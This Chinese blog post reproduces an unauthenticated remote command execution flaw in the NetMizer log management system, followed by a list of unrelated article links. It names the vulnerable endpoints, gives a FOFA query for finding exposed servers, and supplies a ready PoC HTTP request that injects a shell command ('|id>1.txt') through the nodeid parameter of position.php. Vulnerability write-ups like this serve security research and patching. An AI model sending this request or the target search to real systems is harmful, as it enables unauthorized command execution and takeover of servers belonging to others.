NetMizer 日志管理系统 多处前台RCE漏洞复现

0x01 产品简介

NetMizer是提供集成应用交付和应用安全解决方案以实现业务智能网络的优秀全球供应商,为全球企业和运营商提供确保关键业务应用的全面可用性、高性能和完善的安全性的解决方案。

0x02 漏洞概述

NetMizer 日志管理系统position.php、hostdelay.php、等接口处存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:title="NetMizer 日志管理系统"

0x04 漏洞复现

PoC-1

GET /data/search/position.php?action=file&nodeid=|id>1.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-15 19:52:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-15 19:52:03       101 阅读
  3. 在Django里面运行非项目文件

    2024-02-15 19:52:03       82 阅读
  4. Python语言-面向对象

    2024-02-15 19:52:03       91 阅读

热门阅读

  1. 力扣-344. 反转字符串

    2024-02-15 19:52:03       43 阅读
  2. TDC - Crisis/Phobia - 4 types of Crisis

    2024-02-15 19:52:03       45 阅读
  3. Spring Cloud Ribbon:负载均衡

    2024-02-15 19:52:03       36 阅读
  4. centos7.9 搭建k8s

    2024-02-15 19:52:03       52 阅读
  5. 盘点五种常用的数据加密技术

    2024-02-15 19:52:03       46 阅读
  6. Win 10 如何升级 Win 11

    2024-02-15 19:52:03       57 阅读
  7. 数据结构基础

    2024-02-15 19:52:03       45 阅读
  8. 跟着pink老师前端入门教程-day25

    2024-02-15 19:52:03       58 阅读
  9. gorm day8

    2024-02-15 19:52:03       34 阅读
  10. 面试计算机网络框架八股文十问十答第五期

    2024-02-15 19:52:03       61 阅读